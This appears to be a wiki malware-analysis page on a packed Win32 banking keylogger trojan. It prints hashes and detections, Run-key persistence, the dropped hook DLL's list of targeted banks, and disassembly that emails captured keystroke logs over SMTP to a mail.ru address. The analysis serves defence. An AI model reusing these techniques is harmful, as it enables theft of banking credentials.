0d17e183c730047bf109a8310e78009e

From aldeid
Jump to: navigation, search

Description

Summary

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Identification

MD5 0d17e183c730047bf109a8310e78009e
SHA1 b56cfb469afc44b404871a2841a28c00f019e3ad
SHA256 afc6422a2fa81952373fcdd60846b719e30cb85be5ad3dfb67f5b103c321ed58
ssdeep 96:5yZpVAYPpVsPxSQqggM2EjlBm8eyK7RMv05waJHqPOvj:5yDmipOJSQqNJKlW9k4H1j
imphash 87bed5a7cba00c7e1f4015f1bdae2183
File size 4.6 KB ( 4736 bytes )
File type Win32 EXE
Magic literal MS-DOS executable, MZ for MS-DOS

Antivirus detection

Antivirus Result Update
AVG PSW.Agent.A 20140220
Ad-Aware Trojan.Spy.Agent.D 20140221
Agnitum TrojanSpy.Agent!WgM5ZpzSbf8 20140220
AntiVir TR/Bytever.A.DRP 20140221
Antiy-AVL Trojan[Banker]/Win32.Banker 20140219
Avast Win32:Stavin [Trj] 20140221
Baidu-International Trojan.Win32.Banker.aQk 20140221
BitDefender Trojan.Spy.Agent.D 20140221
Bkav W32.Clodac4.Trojan.687e 20140220
CAT-QuickHeal TrojanBanker.Banker.a 20140221
CMC Generic.Win32.0d17e183c7!MD 20140220
Commtouch W32/Fedpo.LFLJ-5425 20140221
Comodo TrojWare.Win32.Spy.Agent.D 20140221
DrWeb Trojan.PWS.Pentas 20140221
ESET-NOD32 Win32/Spy.Agent.D 20140221
Emsisoft Trojan.Spy.Agent.D (B) 20140221
F-Prot W32/[email protected] 20140221
F-Secure Trojan.Spy.Agent.D 20140221
Fortinet W32/Banker.AW!tr 20140221
GData Trojan.Spy.Agent.D 20140221
Ikarus Trojan-Spy.Win32.Banker.A 20140221
Jiangmin Trojan/Banker.Banker.nus 20140221
K7AntiVirus Trojan ( 0036e6f71 ) 20140220
K7GW Trojan ( 0036e6f71 ) 20140220
Kaspersky Trojan-Banker.Win32.Banker.a 20140221
Kingsoft Win32.Troj.Keylogger.a.(kcloud) 20140221
McAfee Keylog-Stawin 20140221
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-BAY.G 20140221
MicroWorld-eScan Trojan.Spy.Agent.D 20140221
Microsoft PWS:Win32/Agent 20140221
NANO-Antivirus Trojan.Win32.Banker.dbvx 20140220
Norman Suspicious_F.A 20140221
Panda Trj/Agent.B 20140220
Qihoo-360 Win32/Trojan.79f 20140221
Rising PE:Trojan.Spy.Banker.crf!1173750932 20140219
SUPERAntiSpyware Trojan.Agent/Gen-FSG 20140221
Sophos Troj/Stawin-B 20140221
Symantec Infostealer.Tarno.D 20140221
TheHacker Trojan/Spy.Banker.a 20140220
TotalDefense Win32/Elkong.E 20140221
TrendMicro TROJ_TARNO.R 20140221
TrendMicro-HouseCall TROJ_TARNO.R 20140221
VBA32 Trojan-Spy.Win32.Banker.a 20140220
VIPRE BehavesLike.Win32.Malware.wsc (mx-v) 20140221
ViRobot Trojan.Win32.Agent.4736 20140221
nProtect Trojan-Spy/W32.Banker.4736 20140220
AhnLab-V3 20140220
ByteHero 20140221
ClamAV 20140221
Malwarebytes 20140221

Defensive capabilities

Packer

The malware is packed with FSG 1.3

Dynamic analysis

Registry keys

Following registry key has been created to ensure persistence:

Path HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Name OLE
Type REG_SZ
Value C:\WINDOWS\javautil.exe

Files

Creates following file:

  • C:\WINDOWS\HookerDll.Dll

Copies itself into:

  • C:\WINDOWS\javautil.exe

Keylogger capabilities

DLL

During the infection process, the file C:\WINDOWS\HookerDll.Dll is dropped. It is a keylogger.

MD5 d9c6cff90a624ae89113ed72004ee71e
SHA1 23a69d832056b39646c9d0d66bcdbd11cde3a7e1
SHA256 340c115b7bd6bdfe1c56df75821dcfde1731cfaabe2ed44a165fd0450c4a5369
ssdeep 48:KYLLvDajnqKFU9TVMotGVBxgbzuJMR0qr0nTMp3GmDzo:rPvKxFU9TVM4ubgbzumyY0nTMpFo
imphash e0a3278cddafa2165c7e46c980ac5195
File size 5.0 KB ( 5120 bytes )
File type Win32 DLL
Magic literal PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Activity logged to kgn.txt

Captured keystrokes when the victim conducts banking transactions

.data:10003000 ; char aWestpac[]
.data:10003000 aWestpac        db 'Westpac',0          ; DATA XREF: StartAddress+18�o
.data:10003000                                         ; fn+CD�o ...
.data:10003008 aAnz            db 'ANZ',0
.data:1000300C aBendigo        db 'bendigo',0
.data:10003014 aBendigo_0      db 'Bendigo',0
.data:1000301C aEBendigo       db 'e-bendigo',0
.data:10003026 aEBendigo_0     db 'e-Bendigo',0
.data:10003030 aCommbank       db 'commbank',0
.data:10003039 aCommonwealth   db 'Commonwealth',0
.data:10003046 aNetbank        db 'NetBank',0
.data:1000304E aCitibank       db 'Citibank',0
.data:10003057 aBankOfAmerica  db 'Bank of America',0
.data:10003067 aEGold          db 'e-gold',0
.data:1000306E aEBullion       db 'e-bullion',0
.data:10003078 aEBullion_0     db 'e-Bullion',0
.data:10003082 aEvocash        db 'evocash',0
.data:1000308A aEvocash_0      db 'EVOCash',0
.data:10003092 aEvocash_1      db 'EVOcash',0
.data:1000309A aIntgold        db 'intgold',0
.data:100030A2 aIntgold_0      db 'INTGold',0
.data:100030AA aPaypal         db 'paypal',0
.data:100030B1 aPaypal_0       db 'PayPal',0
.data:100030B8 aBankwest       db 'bankwest',0
.data:100030C1 aBankWest       db 'Bank West',0
.data:100030CB aBankwest_0     db 'BankWest',0
.data:100030D4 aNationalIntern db 'National Internet Banking',0
.data:100030EE aCibc           db 'cibc',0
.data:100030F3 aCibc_0         db 'CIBC',0
.data:100030F8 aScotiabank     db 'scotiabank',0
.data:10003103 aScotiabank_0   db 'ScotiaBank',0
.data:1000310E aScotiaBank     db 'Scotia Bank',0
.data:1000311A aBmo            db 'bmo',0
.data:1000311E aBmo_0          db 'BMO',0
.data:10003122 aBankOfMontreal db 'bank of montreal',0
.data:10003133 aBankOfMontre_0 db 'Bank of Montreal',0
.data:10003144 aRoyalbank      db 'royalbank',0
.data:1000314E aRoyalBank      db 'Royal Bank',0
.data:10003159 aRoyalbank_0    db 'RoyalBank',0
.data:10003163 aTdwaterhouse   db 'tdwaterhouse',0
.data:10003170 aTdCanadaTrust  db 'TD Canada Trust',0
.data:10003180 aTdWaterhouse   db 'TD Waterhouse',0
.data:1000318E aPresidentSChoi db 'president',27h,'s choice',0
.data:100031A1 aPresidentSCh_0 db 'President',27h,'s Choice',0
.data:100031B4 aPresidentChoic db 'President Choice',0
.data:100031C5 aSuncorpmetway  db 'suncorpmetway',0
.data:100031D3 aSuncorp        db 'Suncorp',0
.data:100031DB aMacquarie      db 'macquarie',0
.data:100031E5 aMacquarie_0    db 'Macquarie',0
.data:100031EF aIntgold_1      db 'INTgold',0
.data:100031F7 a1mdc           db '1mdc',0
.data:100031FC a1mdc_0         db '1MDC',0
.data:10003201 aTdWaterhouse_0 db 'TD Waterhouse',0
.data:1000320F aGoldmoney      db 'goldmoney',0
.data:10003219 aGoldmoney_0    db 'GoldMoney',0
.data:10003223 aGoldgrams      db 'goldgrams',0
.data:1000322D aPecunix        db 'pecunix',0
.data:10003235 aPecunix_0      db 'Pecunix',0
.data:1000323D aPecunX         db 'Pecun!x',0
.data:10003245 aHyperwallet    db 'hyperwallet',0
.data:10003251 aHyperwallet_0  db 'HyperWallet',0
.data:1000325D aWellsFargo     db 'Wells Fargo',0
.data:10003269 aBankOne        db 'Bank One',0
.data:10003272 aBanesto        db 'Banesto',0
.data:1000327A aCaixa          db 'CAIXA',0
.data:10003280 aSuntrust       db 'SunTrust',0
.data:10003289 aSunTrust       db 'Sun Trust',0
.data:10003293 aDiscoverCard   db 'Discover Card',0
.data:100032A1 aBnz            db 'BNZ',0
.data:100032A5 aWashingtonMutu db 'Washington Mutual',0
.data:100032B7 aWachovia       db 'Wachovia',0
.data:100032C0 aDesjardins     db 'desjardins',0
.data:100032CB aChase          db 'Chase',0

The activity is logged to a text file nammed kgn.txt:

.text:100011A3                 push    offset String2  ; "\\kgn.txt"
.text:100011A8                 push    offset FileName ; lpString1
.text:100011AD                 call    lstrcatA
.text:100011B2                 push    0               ; hTemplateFile
.text:100011B4                 push    0               ; dwFlagsAndAttributes
.text:100011B6                 push    4               ; dwCreationDisposition
.text:100011B8                 push    0               ; lpSecurityAttributes
.text:100011BA                 push    3               ; dwShareMode
.text:100011BC                 push    0C0000000h      ; dwDesiredAccess
.text:100011C1                 push    offset FileName ; lpFileName
.text:100011C6                 call    CreateFileA

Log file sent to a mail.ru email address

push    offset aMailFromPentas ; "MAIL FROM:<[email protected]>\r\n"
call    sub_401057	
inc     eax	
jz      loc_40118D	
call    sub_401000	
test    eax, eax	
jz      loc_40118D	
push    offset aRcptToPentasat ; "RCPT TO:<[email protected]>\r\n"
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
push    offset dword_404400	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
push    400h            ; namelen	
push    offset ExistingFileName ; name	
call    gethostname	
push    offset ExistingFileName	
push    offset aSubjectKeylogF ; "Subject: KeyLog from (%s)\r\n\r\n"
push    offset byte_414510 ; LPSTR	
call    wsprintfA	
add     esp, 0Ch	
push    offset byte_414510	
call    sub_401057	
test    eax, eax	
jz      short loc_40118D	
push    [ebp+arg_0]	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
push    offset a_       ; "\r\n.\r\n"	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
or      edi, 1

Static analysis

Strings

Install
Uninstall
EDIT
%s\\%s
\\kgn.txt
user32.dll
kernel32.dll
wsock32.dll
advapi32.dll
SHELL32.dll
ole32.dll
wininet.dll
\r\n------------------------------\r\n\r\n
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
EHLO localhost\r\n
\r\n.\r\n
Subject: KeyLog from (%s)\r\n\r\n
MAIL FROM:<[email protected]>\r\n
RCPT TO:<[email protected]>\r\n
SOFTWARE\\Microsoft\\Windows\\CurrentVersio
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:

IAT

exe

SHELL32

  • ShellExecuteA

advapi32

  • RegSetValueExA
  • RegCreateKeyA
  • RegCloseKey

kernel32

  • lstrlenA
  • CloseHandle
  • CopyFileA
  • CreateFileA
  • DeleteFileA
  • ExitProcess
  • FreeLibrary
  • GetModuleFileNameA
  • GetModuleHandleA
  • GetProcAddress
  • GetWindowsDirectoryA
  • GlobalAlloc
  • GlobalFree
  • LoadLibraryA
  • LocalAlloc
  • ReadFile
  • WideCharToMultiByte
  • WriteFile
  • lstrcmpiA
  • lstrcmpA
  • lstrcatA

ole32

  • CoTaskMemFree
  • CoInitialize

user32

  • TranslateMessage
  • SetWindowLongA
  • SetTimer
  • GetMessageA
  • DispatchMessageA
  • CreateWindowExA
  • wsprintfA

wininet

  • FindFirstUrlCacheEntryA
  • FindCloseUrlCache
  • DeleteUrlCacheEntryA
  • FindNextUrlCacheEntryA

wsock32

  • gethostname
  • WSAStartup
  • recv
  • send
  • socket
  • closesocket
  • connect

DLL

kernel32.dll

  • lstrlenA
  • CreateThread
  • GetFileSize
  • SetFilePointer
  • lstrcatA
  • lstrcpyA
  • GetWindowsDirectoryA
  • WriteFile
  • Sleep
  • CloseHandle
  • CreateFileA

shlwapi.dll

  • StrStrIA

user32.dll

  • EmptyClipboard
  • GetForegroundWindow
  • GetKeyboardState
  • SetWindowsHookExA
  • GetKeyNameTextA
  • UnhookWindowsHookEx
  • wsprintfA
  • CloseClipboard
  • ToAscii
  • GetClipboardOwner
  • GetWindowTextA
  • OpenClipboard


Comments

blog comments powered by Disqus